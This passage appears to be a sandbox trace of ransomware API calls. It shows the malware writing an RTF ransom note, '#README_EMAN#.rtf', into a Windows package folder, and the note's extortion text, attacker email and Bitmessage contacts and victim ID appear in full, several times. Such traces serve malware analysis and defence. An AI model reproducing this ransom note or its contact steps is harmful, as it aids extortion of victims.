n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0221.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x83\x94\x0f6\x15<±É~ëüåMÔq\x1dái\x0føÀ9m3\n", lpUsedDefaultChar=0x0) returned 8717 [0221.465] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0221.465] CloseHandle (hObject=0x2c8) returned 1 [0221.465] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0221.465] GetLastError () returned 0x2 [0221.465] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0221.469] WideCharToMultiByte (in: 